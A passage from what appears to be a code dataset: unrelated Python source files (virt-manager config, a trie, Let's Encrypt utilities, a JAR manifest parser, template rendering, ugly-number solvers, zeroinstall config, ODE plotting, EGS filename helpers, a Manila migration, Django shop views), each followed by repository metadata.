CPU.SPECIAL_MODE_HOST_MODEL,
CPU.SPECIAL_MODE_HV_DEFAULT]
if ret not in whitelist:
ret = "default"
if ret == "default" and not raw:
ret = self.cpu_default_from_config
if ret not in whitelist:
ret = whitelist[0]
if for_cpu and ret == CPU.SPECIAL_MODE_HOST_MODEL:
# host-model has known issues, so use our 'copy cpu'
# behavior until host-model does what we need
ret = CPU.SPECIAL_MODE_HOST_COPY
return ret
def set_default_cpu_setting(self, val):
self.conf.set("/new-vm/cpu-default", val.lower())
# URL/Media path history
def _url_add_helper(self, gsettings_path, url):
maxlength = 10
urls = self.conf.get(gsettings_path)
if urls is None:
urls = []
if urls.count(url) == 0 and len(url) > 0 and not url.isspace():
# The url isn't already in the list, so add it
urls.insert(0, url)
if len(urls) > maxlength:
del urls[len(urls) - 1]
self.conf.set(gsettings_path, urls)
def add_media_url(self, url):
self._url_add_helper("/urls/urls", url)
def add_kickstart_url(self, url):
self._url_add_helper("/urls/kickstarts", url)
def add_iso_path(self, path):
self._url_add_helper("/urls/isos", path)
def get_media_urls(self):
return self.conf.get("/urls/urls")
def get_kickstart_urls(self):
return self.conf.get("/urls/kickstarts")
def get_iso_paths(self):
return self.conf.get("/urls/isos")
# Whether to ask about fixing path permissions
def add_perms_fix_ignore(self, pathlist):
current_list = self.get_perms_fix_ignore() or []
for path in pathlist:
if path in current_list:
continue
current_list.append(path)
self.conf.set("/paths/perms-fix-ignore", current_list)
def get_perms_fix_ignore(self):
return self.conf.get("/paths/perms-fix-ignore")
# Manager view connection list
def add_conn(self, uri):
if self.test_first_run:
return
uris = self.conf.get("/connections/uris")
if uris is None:
uris = []
if uris.count(uri) == 0:
uris.insert(len(uris) - 1, uri)
self.conf.set("/connections/uris", uris)
def remove_conn(self, uri):
uris = self.conf.get("/connections/uris")
if uris is None:
return
if uris.count(uri) != 0:
uris.remove(uri)
self.conf.set("/connections/uris", uris)
if self.get_conn_autoconnect(uri):
uris = self.conf.get("/connections/autoconnect")
uris.remove(uri)
self.conf.set("/connections/autoconnect", uris)
def get_conn_uris(self):
if self.test_first_run:
return []
return self.conf.get("/connections/uris")
# Manager default window size
def get_manager_window_size(self):
w = self.conf.get("/manager-window-width")
h = self.conf.get("/manager-window-height")
return (w, h)
def set_manager_window_size(self, w, h):
self.conf.set("/manager-window-width", w)
self.conf.set("/manager-window-height", h)
# URI autoconnect
def get_conn_autoconnect(self, uri):
uris = self.conf.get("/connections/autoconnect")
return ((uris is not None) and (uri in uris))
def set_conn_autoconnect(self, uri, val):
if self.test_first_run:
return
uris = self.conf.get("/connections/autoconnect")
if uris is None:
uris = []
if not val and uri in uris:
uris.remove(uri)
elif val and uri not in uris:
uris.append(uri)
self.conf.set("/connections/autoconnect", uris)
# Default directory location dealings
def _get_default_dir_key(self, _type):
if (_type in [self.CONFIG_DIR_ISO_MEDIA,
self.CONFIG_DIR_FLOPPY_MEDIA]):
return "media"
if (_type in [self.CONFIG_DIR_IMAGE,
self.CONFIG_DIR_SCREENSHOT]):
return _type
return None
def get_default_directory(self, conn, _type):
key = self._get_default_dir_key(_type)
path = None
if key:
path = self.conf.get("/paths/%s-default" % key)
if not path:
if (_type == self.CONFIG_DIR_IMAGE or
_type == self.CONFIG_DIR_ISO_MEDIA or
_type == self.CONFIG_DIR_FLOPPY_MEDIA):
path = self.get_default_image_dir(conn)
if (_type == self.CONFIG_DIR_SAVE or
_type == self.CONFIG_DIR_RESTORE):
path = self.get_default_save_dir(conn)
logging.debug("directory for type=%s returning=%s", _type, path)
return path
def set_default_directory(self, folder, _type):
key = self._get_default_dir_key(_type)
if not key:
return
logging.debug("saving directory for type=%s to %s", key, folder)
self.conf.set("/paths/%s-default" % key, folder)
def get_default_image_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_IMAGE_DIR
if (conn.is_qemu_session() or
not os.access(self.DEFAULT_VIRT_IMAGE_DIR, os.W_OK)):
return os.getcwd()
# Just return the default dir since the intention is that it
# is a managed pool and the user will be able to install to it.
return self.DEFAULT_VIRT_IMAGE_DIR
def get_default_save_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_SAVE_DIR
elif os.access(self.DEFAULT_VIRT_SAVE_DIR, os.W_OK):
return self.DEFAULT_VIRT_SAVE_DIR
else:
return os.getcwd()
# Keyring / VNC password dealings
def get_secret_name(self, vm):
return "vm-console-" + vm.get_uuid()
def has_keyring(self):
if self.keyring is None:
self.keyring = vmmKeyring()
return self.keyring.is_available()
def get_console_password(self, vm):
if not self.has_keyring():
return ("", "")
username, keyid = vm.get_console_password()
if keyid == -1:
return ("", "")
secret = self.keyring.get_secret(keyid)
if secret is None or secret.get_name() != self.get_secret_name(vm):
return ("", "")
if (secret.attributes.get("hvuri", None) != vm.conn.get_uri() or
secret.attributes.get("uuid", None) != vm.get_uuid()):
return ("", "")
return (secret.get_secret(), username or "")
def set_console_password(self, vm, password, username=""):
if not self.has_keyring():
return
secret = vmmSecret(self.get_secret_name(vm), password,
{"uuid" : vm.get_uuid(),
"hvuri": vm.conn.get_uri()})
keyid = self.keyring.add_secret(secret)
if keyid is None:
return
vm.set_console_password(username, keyid)
|
gpl-2.0
| -5,542,892,643,271,892,000
| 35.148415
| 79
| 0.604775
| false
| 3.603936
| true
| false
| false
|
armsky/Algorithms
|
Data Structure/trie.py
|
1
|
1534
|
class TrieNode:
# Initialize your data structure here.
def __init__(self):
self.children = {}
self.is_word = False
class Trie:
def __init__(self):
self.root = TrieNode()
# @param {string} word
# @return {void}
# Inserts a word into the trie.
def insert(self, word):
if word:
node = self.root
for char in word:
child = node.children.get(char)
if not child:
child = TrieNode()
node.children[char] = child
node = child
node.is_word = True
# @param {string} word
# @return {boolean}
# Returns if the word is in the trie.
def search(self, word):
if word:
node = self.root
for char in word:
if char not in node.children:
return False
node = node.children[char]
return node.is_word
else:
return False
# @param {string} prefix
# @return {boolean}
# Returns if there is any word in the trie
# that starts with the given prefix.
def startsWith(self, prefix):
if prefix:
node = self.root
for char in prefix:
if char not in node.children:
return False
node = node.children[char]
return True
return False
trie = Trie()
trie.insert("a")
trie.insert("ab")
print trie.search("a")
print trie.search("ab")
|
apache-2.0
| -8,049,908,019,752,421,000
| 25.448276
| 47
| 0.508475
| false
| 4.191257
| false
| false
| false
|
felixrieseberg/lets-encrypt-preview
|
letsencrypt/le_util.py
|
1
|
2392
|
"""Utilities for all Let's Encrypt."""
import collections
import errno
import os
import stat
from letsencrypt import errors
Key = collections.namedtuple("Key", "file pem")
# Note: form is the type of data, "pem" or "der"
CSR = collections.namedtuple("CSR", "file data form")
def make_or_verify_dir(directory, mode=0o755, uid=0):
"""Make sure directory exists with proper permissions.
:param str directory: Path to a directory.
:param int mode: Directory mode.
:param int uid: Directory owner.
:raises LetsEncryptClientError: if a directory already exists,
but has wrong permissions or owner
:raises OSError: if invalid or inaccessible file names and
paths, or other arguments that have the correct type,
but are not accepted by the operating system.
"""
try:
os.makedirs(directory, mode)
except OSError as exception:
if exception.errno == errno.EEXIST:
if not check_permissions(directory, mode, uid):
raise errors.LetsEncryptClientError(
"%s exists, but does not have the proper "
"permissions or owner" % directory)
else:
raise
def check_permissions(filepath, mode, uid=0):
"""Check file or directory permissions.
:param str filepath: Path to the tested file (or directory).
:param int mode: Expected file mode.
:param int uid: Expected file owner.
:returns: True if `mode` and `uid` match, False otherwise.
:rtype: bool
"""
file_stat = os.stat(filepath)
return stat.S_IMODE(file_stat.st_mode) == mode and file_stat.st_uid == uid
def unique_file(path, mode=0o777):
"""Safely finds a unique file for writing only (by default).
:param str path: path/filename.ext
:param int mode: File mode
:return: tuple of file object and file name
"""
path, tail = os.path.split(path)
count = 0
while True:
fname = os.path.join(path, "%04d_%s" % (count, tail))
try:
file_d = os.open(fname, os.O_CREAT | os.O_EXCL | os.O_RDWR, mode)
return os.fdopen(file_d, "w"), fname
except OSError:
pass
count += 1
def safely_remove(path):
"""Remove a file that may not exist."""
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
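# Illustrative sketch only (directory and mode below are hypothetical):
# reserve a unique file, write to it, then clean it up again.
if __name__ == "__main__":
    import tempfile
    demo_dir = tempfile.mkdtemp()
    handle, name = unique_file(os.path.join(demo_dir, "example.txt"), 0o644)
    handle.write("demo\n")
    handle.close()
    safely_remove(name)
    os.rmdir(demo_dir)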
|
apache-2.0
| 6,374,653,857,685,918,000
| 27.47619
| 78
| 0.629599
| false
| 3.921311
| false
| false
| false
|
salimfadhley/jenkinsapi
|
jenkinsapi/utils/manifest.py
|
3
|
3306
|
"""
This module enables Manifest file parsing.
Copied from
https://chromium.googlesource.com/external/googleappengine/python/+/master
/google/appengine/tools/jarfile.py
"""
import zipfile
_MANIFEST_NAME = 'META-INF/MANIFEST.MF'
class InvalidJarError(Exception):
"""
InvalidJar exception class
"""
pass
class Manifest(object):
"""The parsed manifest from a jar file.
Attributes:
main_section: a dict representing the main (first)
section of the manifest.
Each key is a string that is an attribute, such as
'Manifest-Version', and the corresponding value is a string that
is the value of the attribute, such as '1.0'.
sections: a dict representing the other sections of the manifest.
Each key is a string that is the value of the 'Name' attribute for
the section, and the corresponding value is a dict like the
main_section one, for the other attributes.
"""
def __init__(self, main_section, sections):
self.main_section = main_section
self.sections = sections
def read_manifest(jar_file_name):
"""Read and parse the manifest out of the given jar.
Args:
jar_file_name: the name of the jar from which the manifest is to be read.
Returns:
A parsed Manifest object, or None if the jar has no manifest.
Raises:
IOError: if the jar does not exist or cannot be read.
"""
with zipfile.ZipFile(jar_file_name) as jar:
try:
manifest_string = jar.read(_MANIFEST_NAME).decode('UTF-8')
except KeyError:
return None
return _parse_manifest(manifest_string)
def _parse_manifest(manifest_string):
"""Parse a Manifest object out of the given string.
Args:
manifest_string: a str or unicode that is the manifest contents.
Returns:
A Manifest object parsed out of the string.
Raises:
InvalidJarError: if the manifest is not well-formed.
"""
manifest_string = '\n'.join(manifest_string.splitlines()).rstrip('\n')
section_strings = manifest_string.split('\n\n')
parsed_sections = [_parse_manifest_section(s) for s in section_strings]
main_section = parsed_sections[0]
sections = dict()
try:
for entry in parsed_sections[1:]:
sections[entry['Name']] = entry
except KeyError:
raise InvalidJarError(
'Manifest entry has no Name attribute: %s' % entry)
return Manifest(main_section, sections)
def _parse_manifest_section(section):
"""Parse a dict out of the given manifest section string.
Args:
section: a str or unicode that is the manifest section.
It looks something like this (without the >):
> Name: section-name
> Some-Attribute: some value
> Another-Attribute: another value
Returns:
A dict where the keys are the attributes (here, 'Name', 'Some-Attribute',
'Another-Attribute'), and the values are the corresponding
attribute values.
Raises:
InvalidJarError: if the manifest section is not well-formed.
"""
section = section.replace('\n ', '')
try:
return dict(line.split(': ', 1) for line in section.split('\n'))
except ValueError:
raise InvalidJarError('Invalid manifest %r' % section)
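# Illustrative only: parse a small, invented manifest fragment.
if __name__ == '__main__':
    _example = ('Manifest-Version: 1.0\n'
                'Created-By: example\n'
                '\n'
                'Name: com/example/Foo.class\n'
                'SHA-256-Digest: deadbeef\n')
    _manifest = _parse_manifest(_example)
    print(_manifest.main_section['Manifest-Version'])   # 1.0
    print(sorted(_manifest.sections.keys()))            # ['com/example/Foo.class']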
|
mit
| -2,833,017,234,510,234,000
| 33.082474
| 79
| 0.659407
| false
| 4.190114
| false
| false
| false
|
rogerthat-platform/rogerthat-backend
|
src/rogerthat/templates/__init__.py
|
1
|
3596
|
# -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
import logging
import os
from rogerthat import consts
from rogerthat.settings import get_server_settings
from rogerthat.templates.jinja_extensions import TranslateExtension
from rogerthat.translations import DEFAULT_LANGUAGE
from google.appengine.ext.webapp import template
import jinja2
from mcfw.rpc import returns, arguments
TEMPLATES_DIR = os.path.dirname(__file__)
_SUPPORTED_LANGUAGES = [d for d in os.listdir(TEMPLATES_DIR) if os.path.isdir(os.path.join(TEMPLATES_DIR, d))]
_CONSTS = dict(((name, getattr(consts, name)) for name in dir(consts) if name.upper() == name))
JINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader([os.path.join(os.path.dirname(__file__))]),
extensions=[TranslateExtension])
@returns(unicode)
@arguments(template_name=str, languages=[str], variables=dict, category=unicode)
def render(template_name, languages, variables, category=""):
logging.info("Rendering %s for languages %s" % (template_name, languages))
variables = dict(variables)
variables.update(_CONSTS)
variables["BASE_URL"] = get_server_settings().baseUrl
variables["INCLUDE_ROGERTHAT_DOT_NET"] = True
if not languages:
languages = list()
languages.append(DEFAULT_LANGUAGE)
logging.debug("Supported languages: %s" % _SUPPORTED_LANGUAGES)
for lang in languages:
lang = lang.replace('-', '_')
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
if '_' in lang:
lang = lang.split('_')[0]
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
raise NotImplementedError("Template not found!")
@returns([str])
@arguments(header=unicode)
def get_languages_from_header(header):
if not header:
return [DEFAULT_LANGUAGE]
try:
languages = list()
for item in header.split(','):
items = item.split(';')
lang = items[0]
splitted = lang.split('-')
if len(splitted) == 2:
lang = '%s_%s' % (splitted[0].lower(), splitted[1].upper())
if len(items) == 1:
languages.append((lang, 1.0))
else:
qualifier = items[1].split("=")[1]
languages.append((lang, float(qualifier)))
return [str(i[0]) for i in sorted(languages, key=lambda x: x[1], reverse=True)]
except:
logging.exception("Could not parse language header.")
return [DEFAULT_LANGUAGE]
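# Illustrative parse only (header value invented here): quality factors decide
# the ordering of the returned codes, e.g.
# get_languages_from_header('nl-BE,nl;q=0.8,en;q=0.6') -> ['nl_BE', 'nl', 'en']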
@returns([str])
@arguments(request=object)
def get_languages_from_request(request):
return get_languages_from_header(request.headers.get('Accept-Language', None))
|
apache-2.0
| -4,756,188,799,871,613,000
| 38.955556
| 113
| 0.666574
| false
| 3.866667
| false
| false
| false
|
shub0/algorithm-data-structure
|
python/ugly_nums.py
|
1
|
1800
|
'''
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
'''
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
        if num <= 0:
            # 0 and negative numbers are not ugly by definition; recursing on
            # -num would also never terminate for num == 0.
            return False
while num > 1:
if (num % 2 == 0):
num /= 2
elif (num % 3 == 0):
num /= 3
elif (num % 5 == 0):
num /= 5
else:
return False
return True
def nthSuperUglyNumber(self, n, primes):
"""
:type n: int
:type primes: List[int]
:rtype: int
"""
size = len(primes)
nums = [1]
indices = [0] * size
local_num = [0] * size
while n > 1:
local_num = [ primes[index] * nums[indices[index]] for index in range(size) ]
num = min(local_num)
for index in range(size):
if local_num[index] == num:
indices[index] += 1
nums.append(num)
n -= 1
return nums[-1]
def nthUglyNumber(self, n):
"""
:type n: int
:rtype: int
"""
nums = [1]
i2,i3,i5=0,0,0
        while n > 1:
u2,u3,u5 = nums[i2]*2, nums[i3]*3, nums[i5]*5
num = min(u2, u3, u5)
if num == u2:
i2 += 1
if num == u3:
i3 += 1
if num == u5:
i5 += 1
nums.append(num)
n -= 1
        return nums[-1]
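# Quick illustrative checks (values arbitrary): 6 = 2*3 is ugly, 14 = 2*7 is
# not, and the 10th ugly number is 12.
if __name__ == '__main__':
    solution = Solution()
    print(solution.isUgly(6))          # True
    print(solution.isUgly(14))         # False
    print(solution.nthUglyNumber(10))  # 12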
|
bsd-3-clause
| 8,164,448,989,103,989,000
| 26.272727
| 165
| 0.436111
| false
| 3.73444
| false
| false
| false
|
dabrahams/zeroinstall
|
zeroinstall/injector/config.py
|
1
|
4191
|
"""
Holds user settings and various helper objects.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from zeroinstall import _
import os
from logging import info, warn
import ConfigParser
from zeroinstall import zerostore
from zeroinstall.injector.model import network_levels, network_full
from zeroinstall.injector.namespaces import config_site, config_prog
from zeroinstall.support import basedir
DEFAULT_FEED_MIRROR = "http://roscidus.com/0mirror"
DEFAULT_KEY_LOOKUP_SERVER = 'https://keylookup.appspot.com'
class Config(object):
"""
@ivar auto_approve_keys: whether to approve known keys automatically
@type auto_approve_keys: bool
@ivar handler: handler for main-loop integration
@type handler: L{handler.Handler}
@ivar key_info_server: the base URL of a key information server
@type key_info_server: str
@ivar feed_mirror: the base URL of a mirror site for keys and feeds
@type feed_mirror: str | None
@ivar freshness: seconds since a feed was last checked before it is considered stale
@type freshness: int
"""
__slots__ = ['help_with_testing', 'freshness', 'network_use', 'feed_mirror', 'key_info_server', 'auto_approve_keys',
'_fetcher', '_stores', '_iface_cache', '_handler', '_trust_mgr', '_trust_db']
def __init__(self, handler = None):
self.help_with_testing = False
self.freshness = 60 * 60 * 24 * 30
self.network_use = network_full
self._handler = handler
self._fetcher = self._stores = self._iface_cache = self._trust_mgr = self._trust_db = None
self.feed_mirror = DEFAULT_FEED_MIRROR
self.key_info_server = DEFAULT_KEY_LOOKUP_SERVER
self.auto_approve_keys = True
@property
def stores(self):
if not self._stores:
self._stores = zerostore.Stores()
return self._stores
@property
def iface_cache(self):
if not self._iface_cache:
from zeroinstall.injector import iface_cache
self._iface_cache = iface_cache.iface_cache
#self._iface_cache = iface_cache.IfaceCache()
return self._iface_cache
@property
def fetcher(self):
if not self._fetcher:
from zeroinstall.injector import fetch
self._fetcher = fetch.Fetcher(self)
return self._fetcher
@property
def trust_mgr(self):
if not self._trust_mgr:
from zeroinstall.injector import trust
self._trust_mgr = trust.TrustMgr(self)
return self._trust_mgr
@property
def trust_db(self):
from zeroinstall.injector import trust
        self._trust_db = trust.trust_db
        return self._trust_db
@property
def handler(self):
if not self._handler:
from zeroinstall.injector import handler
if os.isatty(1):
self._handler = handler.ConsoleHandler()
else:
self._handler = handler.Handler()
return self._handler
def save_globals(self):
"""Write global settings."""
parser = ConfigParser.ConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', self.help_with_testing)
parser.set('global', 'network_use', self.network_use)
parser.set('global', 'freshness', self.freshness)
parser.set('global', 'auto_approve_keys', self.auto_approve_keys)
path = basedir.save_config_path(config_site, config_prog)
path = os.path.join(path, 'global')
parser.write(open(path + '.new', 'w'))
os.rename(path + '.new', path)
def load_config(handler = None):
config = Config(handler)
parser = ConfigParser.RawConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', 'False')
parser.set('global', 'freshness', str(60 * 60 * 24 * 30)) # One month
parser.set('global', 'network_use', 'full')
parser.set('global', 'auto_approve_keys', 'True')
path = basedir.load_first_config(config_site, config_prog, 'global')
if path:
info("Loading configuration from %s", path)
try:
parser.read(path)
except Exception as ex:
warn(_("Error loading config: %s"), str(ex) or repr(ex))
config.help_with_testing = parser.getboolean('global', 'help_with_testing')
config.network_use = parser.get('global', 'network_use')
config.freshness = int(parser.get('global', 'freshness'))
config.auto_approve_keys = parser.getboolean('global', 'auto_approve_keys')
assert config.network_use in network_levels, config.network_use
return config
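# Illustrative sketch only: a Config built directly carries the documented
# defaults, while load_config() additionally merges the on-disk "global" file.
if __name__ == '__main__':
    _cfg = Config()
    assert _cfg.network_use == network_full
    assert _cfg.feed_mirror == DEFAULT_FEED_MIRROR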
|
lgpl-2.1
| 1,600,320,682,563,970,000
| 31.238462
| 117
| 0.715581
| false
| 3.199237
| true
| false
| false
|
cjmathy/ode_model
|
ode_modeler/plot.py
|
1
|
3666
|
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
def plot_all_queries(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from all queries on the same plot.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
if out_format == 'pdf_one':
pdf = PdfPages(os.path.join(out_dir + '/all_queries.pdf'))
    if plot_species[0] == 'all':
plot_species = species.keys()
for sp in plot_species:
fig = plt.figure()
for query in queries:
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title(sp)
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.legend(queries)
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(out_dir + '/{}.pdf'.format(sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(os.path.join(out_dir + '/{}.png'.format(sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
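# Hypothetical invocation (the species/queries objects are assumed to come
# from the rest of ode_modeler):
#   plot_all_queries(species, queries, out_dir='figures', out_format='png',
#                    plot_species=['A', 'B'], ttot=100)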
def plot_each_query(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from each query separately.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
    if plot_species[0] == 'all':
plot_species = species.keys()
for query in queries:
if out_format == 'pdf_one':
pdf = PdfPages(
os.path.join(
out_dir + '/{}.pdf'.format(query.name)))
for sp in plot_species:
fig = plt.figure()
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title('{}, {}'.format(sp, query.name))
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(
out_dir + '/{}_{}.pdf'.format(
query.name, sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(
os.path.join(
out_dir + '/{}_{}.png'.format(
query.name, sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
|
apache-2.0
| 3,636,057,399,998,828,000
| 30.333333
| 78
| 0.533824
| false
| 4.091518
| false
| false
| false
|
Iwan-Zotow/runEGS
|
XcIO/names_helper.py
|
1
|
2104
|
# -*- coding: utf-8 -*-
EGSPHAN_EXT = ".egsphant"
EGSINP_EXT = ".egsinp"
EGSPHSF_EXT = ".egsphsp1"
def make_cup_prefix(radUnit, outerCup, innerCupSer, innerCupNum):
"""
Makes filename prefix given RU, OC, IC info
Parameters
----------
radUnit: string
radiation unit
outerCup: string
outer cup info
innerCupSer: string
inner cup serial line
innerCupNum: integer
inner cup number
returns: string
clinical cup name
"""
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
def make_qualified_name(file_prefix, cl, shot):
"""
Makes qualified name
Parameters
----------
file_prefix: string
prefix with RU and cup info
cl: collimator
collimator info
shot: (float,float) tuple
shot position
returns: string
fully qualified cup name
"""
return file_prefix + str(cl) + "_" + "Y{0}Z{1}".format(int(shot[0]),int(shot[1]))
def make_egsinput_name(full_prefix):
"""
Makes EGS input name
"""
return full_prefix + EGSINP_EXT
def parse_file_prefix(s):
"""
Parse file prefix string and produce rad.unit, outer cup, inner cup, inner cup number, collimator
"""
radUnit = str(s[1:2])
outerCup = str(s[3:4])
innerCupSer = str(s[5:6])
innerCupNum = str(s[6:8])
coll = int(str(s[9:11]))
return (radUnit, outerCup, innerCupSer, innerCupNum, coll)
def parse_shot(s):
"""
Parse input string to extract shot
"""
idx_shot = s.find("_")
if idx_shot < 0:
raise ValueError("No shot info in input")
sh = s[idx_shot+1:]
idx_Y = sh.find("Y")
if idx_Y < 0:
raise ValueError("No Y shot position in input")
idx_Z = sh.find("Z")
if idx_Z < 0:
raise ValueError("No Z shot position in input")
sh_Y = sh[idx_Y+1:idx_Z]
sh_Z = sh[idx_Z+1:]
return (float(sh_Y), float(sh_Z))
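# Illustrative round trip (all values hypothetical): build a qualified name,
# then recover the shot position from it.
if __name__ == '__main__':
    prefix = make_cup_prefix("8", "2", "M", "01")              # "R8O2IM01"
    name = make_qualified_name(prefix, "C25", (10.0, 15.0))    # "R8O2IM01C25_Y10Z15"
    print(parse_shot(name))                                    # (10.0, 15.0)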
|
apache-2.0
| 574,515,979,374,324,900
| 21.147368
| 101
| 0.565589
| false
| 3.140299
| false
| false
| false
|
openstack/manila
|
manila/db/migrations/alembic/versions/344c1ac4747f_add_share_instance_access_rules_status.py
|
1
|
4287
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Remove access rules status and add access_rule_status to share_instance
model
Revision ID: 344c1ac4747f
Revises: dda6de06349
Create Date: 2015-11-18 14:58:55.806396
"""
# revision identifiers, used by Alembic.
revision = '344c1ac4747f'
down_revision = 'dda6de06349'
from alembic import op
from sqlalchemy import Column, String
from manila.common import constants
from manila.db.migrations import utils
priorities = {
'active': 0,
'new': 1,
'error': 2
}
upgrade_data_mapping = {
'active': 'active',
'new': 'out_of_sync',
'error': 'error',
}
def upgrade():
"""Transform individual access rules states to 'access_rules_status'.
    WARNING: This method performs a lossy conversion of existing data in the DB.
"""
op.add_column(
'share_instances',
Column('access_rules_status', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
# NOTE(u_glide): Data migrations shouldn't be performed on live clouds
# because it will lead to unpredictable behaviour of running operations
# like migration.
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
access_mappings_query = instance_access_table.select().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False')
status = constants.STATUS_ACTIVE
for access_rule in connection.execute(access_mappings_query):
if (access_rule['state'] == constants.STATUS_DELETING or
access_rule['state'] not in priorities):
continue
if priorities[access_rule['state']] > priorities[status]:
status = access_rule['state']
# pylint: disable=no-value-for-parameter
op.execute(
share_instances_table.update().where(
share_instances_table.c.id == instance['id']
).values({'access_rules_status': upgrade_data_mapping[status]})
)
op.drop_column('share_instance_access_map', 'state')
def downgrade():
op.add_column(
'share_instance_access_map',
Column('state', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
# NOTE(u_glide): We cannot determine if a rule is applied or not in
# Manila, so administrator should manually handle such access rules.
if instance['access_rules_status'] == 'active':
state = 'active'
else:
state = 'error'
# pylint: disable=no-value-for-parameter
op.execute(
instance_access_table.update().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False').values(
{'state': state}
)
)
op.drop_column('share_instances', 'access_rules_status')
|
apache-2.0
| 2,971,264,081,608,974,300
| 31.477273
| 76
| 0.642641
| false
| 3.99534
| false
| false
| false
|
michaelgichia/WeideShop
|
weideshop/products/views.py
|
1
|
3232
|
# -*- coding: utf-8 -*-
# Third party stuff
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, DetailView
from django.views.generic.base import TemplateView
# Our stuff
from .models import Product, Subcategory, Category
class CategoryListView(ListView):
"""
Browse all products in the categories.
"""
    model = Category
template_name = 'products/category_list.html'
context_object_name = "Category list"
def get_queryset(self):
"""
Returns all categories.
"""
return Category.objects.get_queryset().all()
class SubcategoryListView(ListView):
"""
Browse all products in the sub-catalogue.
"""
model = Subcategory
template_name = 'products/subcategory_list.html'
context_object_name = "Sub-Category list"
category_model = Category
def get_queryset(self):
"""
Returns all sub-categories.
"""
self.category = get_object_or_404(Category, category_slug = self.kwargs.get('category_slug'))
return Subcategory.objects.filter(category = self.category)
def get_context_data(self, **kwargs):
"""
        Returns self.category_slug, needed in subcategory_list.html as
        one of the {% url %} slug params.
"""
context = super(SubcategoryListView, self).get_context_data(**kwargs)
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
return context
class ProductListView(ListView):
"""
    Browse products according to the previously selected subcategory.
"""
model = Product
template_name = 'products/product_list.html'
context_object_name = "Product list"
def get_context_data(self, **kwargs):
"""
        Returns self.category_slug and self.subcategory_slug, needed in
        product_list.html as one of the {% url %} slug params.
"""
context = super(ProductListView, self).get_context_data(**kwargs)
# Get category_slug
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
# Get subcategory_slug
context['subcategories'] = Subcategory.objects.all()
context['subcategory_slug'] = self.kwargs.get('subcategory_slug')
return context
def get_queryset(self):
"""
Browse all products under selected subcategory.
"""
